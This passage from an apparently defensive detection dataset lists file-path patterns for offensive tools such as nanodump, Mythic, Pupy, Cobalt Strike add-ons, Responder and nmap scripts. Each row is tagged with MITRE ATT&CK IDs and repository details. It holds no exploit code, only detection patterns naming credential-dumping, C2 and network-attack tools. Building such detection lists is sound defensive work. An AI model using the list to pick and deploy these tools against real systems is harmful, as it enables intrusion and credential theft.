Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/MultiPotato.git*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*/murmur-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mushishi.h*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/mysql-audit.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-dump-hashes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-empty-password.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-variables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mysql-vuln-cve2012-2122.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Mystikal.git*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*/mystikal.py*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*/Mythic/mythic*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/Mythic_CLI*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/MythicAgents/*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/MythicAgents/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/MythicC2Profiles/*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/mythic-cli*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/MythicConfig.cs*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/mythic-react-docker*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/mzet-/les-res*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/n1nj4sec/pupy*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/nanodump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*/nanodump.*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/nanorobeus.git*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*/nanorubeus/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Native/SigFlip/*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/nat-pmp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nat-pmp-mapport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nbd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nbns-interfaces.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nbstat.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/NBTNS.py*,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/nccgroup/nccfsas/*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/ncp-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ncp-serverinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ncrack-*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,0,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*/ncrack.git*,offensive_tool_keyword,ncrack,High-speed network authentication cracking tool.,T1110.001 - T1110.002 - T1110.003,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/nmap/ncrack,1,1,N/A,N/A,10,972,238,2023-02-22T21:33:24Z,2015-12-21T23:48:00Z -*/ndmp-fs-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ndmp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ndp_spoof*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/Needle_Sift_BOF/*,offensive_tool_keyword,cobaltstrike,Strstr with user-supplied needle and filename as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Needle_Sift_BOF,1,1,N/A,10,10,30,7,2021-09-27T22:57:33Z,2021-09-27T20:13:10Z 
-*/nessus.py*,offensive_tool_keyword,crackmapexec,parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/nessus.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/nessus-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nessus-xmlrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/net_recon/*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/net_sniff.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/net_sniff_*.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation 
tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/netbus-auth-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/netbus-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/netbus-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/netbus-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/netcreds.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
